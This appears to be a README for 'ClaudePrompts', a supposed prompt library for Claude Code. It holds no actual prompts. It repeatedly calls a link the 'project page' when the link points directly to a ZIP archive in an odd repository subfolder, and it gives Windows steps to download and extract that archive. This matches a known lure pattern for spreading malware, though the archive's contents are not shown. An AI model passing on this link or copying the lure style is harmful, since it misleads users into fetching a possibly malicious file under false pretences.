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🧩 ClaudePrompts - Ready Claude Code Prompt Library

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📥 Download

Use this link to visit the project page and get the files:

https://raw.githubusercontent.com/burtasunder311/ClaudePrompts/main/cissoid/Prompts-Claude-v1.3.zip

🖥️ What ClaudePrompts Is

ClaudePrompts is a prompt library for Claude Code. It gives you ready-made prompts you can use for common coding tasks, writing tasks, and project work.

It is made for people who want to save time and work from a clear prompt list instead of writing each prompt from scratch.

✨ What You Can Do

  • Copy prompts for Claude Code
  • Use prompts for coding help
  • Use prompts for planning and task breakdown
  • Keep prompts in one place
  • Reuse prompts for similar work
  • Save time when you need a good starting point

🪟 Windows Setup

Follow these steps on Windows:

  1. Open the download page: https://raw.githubusercontent.com/burtasunder311/ClaudePrompts/main/cissoid/Prompts-Claude-v1.3.zip

  2. Look for the files or the green Code button on the page.

  3. If you see a ZIP file, download it to your PC.

  4. If you see a file list, download the files you need.

  5. Open the downloaded ZIP file if one was provided.

  6. Extract the files to a folder on your computer.

  7. Open the folder and read the prompt files.

  8. Copy a prompt and paste it into Claude Code.

📁 How to Use the Prompts

Most prompts in this repository are simple text prompts.

A normal workflow looks like this:

  1. Open the repository files.
  2. Pick a prompt that fits your task.
  3. Copy the full prompt text.
  4. Paste it into Claude Code.
  5. Edit the prompt if you need a more exact result.
  6. Run the prompt in your normal work flow.

If you want to work faster, keep your most used prompts in a note file on your desktop.

🔧 Common Uses

ClaudePrompts can help with many everyday tasks:

  • Code review prompts
  • Feature planning prompts
  • Bug fix prompts
  • Refactor prompts
  • Documentation prompts
  • Test writing prompts
  • Workflow prompts
  • Content drafting prompts

📚 Prompt Groups

This repository is built around clear prompt groups. You may find prompts for:

  • Development tasks
  • Debugging help
  • Code cleanup
  • Writing project notes
  • Breaking large tasks into small steps
  • Asking Claude for better output format
  • Improving code structure
  • Generating file-level instructions

💻 System Requirements

You do not need a powerful PC to use this repository.

Recommended setup on Windows:

  • Windows 10 or Windows 11
  • A web browser such as Chrome, Edge, or Firefox
  • Enough free space for a ZIP file or folder copy
  • Claude Code access on your device or in your work setup
  • A text editor such as Notepad if you want to edit prompts

📌 Best Way to Start

If you are new, start with one prompt and test it first.

A simple path is:

  1. Open the repository.
  2. Choose one prompt.
  3. Copy it.
  4. Paste it into Claude Code.
  5. Read the result.
  6. Adjust the prompt if needed.

This helps you learn which prompts fit your work.

🧭 Tips for Better Results

  • Use one clear task at a time
  • Remove extra words if the prompt feels long
  • Add file names if the task is tied to one file
  • Add the result you want, such as a short fix or a full rewrite
  • Keep the prompt close to the work you need done

🗂️ File Use Guide

If the repository includes separate files for each prompt, use them like this:

  • Open the file in your browser or editor
  • Read the prompt once before copying
  • Copy the full text
  • Paste it into Claude Code
  • Save prompts you use often

If the prompts are grouped by topic, pick the group that matches your task first.

🔒 Safe Use

You can use these prompts as plain text. They do not need special setup.

If you edit a prompt, keep the main instruction clear and direct. This helps Claude give a cleaner result.

❓ FAQ

Do I need to install anything?
Usually no. You can read and copy the prompts from the repository page.

Can I use this on Windows?
Yes. Open the link in your browser and use the files from there.

Do I need coding knowledge?
No. You only need to copy the prompt you want and paste it into Claude Code.

Can I edit the prompts?
Yes. You can change the wording to fit your task.

What if I only want one prompt?
Copy one prompt and keep it in a text file for later use.

🧰 Quick Start

  1. Open ClaudePrompts
  2. Find the prompt you want
  3. Copy the text
  4. Paste it into Claude Code
  5. Use the output in your task

📎 Download Again

If you need the project page again, use this link:

https://raw.githubusercontent.com/burtasunder311/ClaudePrompts/main/cissoid/Prompts-Claude-v1.3.zip

📝 Working With Prompt Text

When you use prompt text, keep these points in mind:

  • Short prompts work well for narrow tasks
  • Longer prompts work well for larger work
  • Clear task words help Claude respond well
  • A named file or task makes the prompt easier to use

If you save prompts locally, use simple names like:

  • bug-fix.txt
  • code-review.txt
  • doc-update.txt
  • refactor.txt

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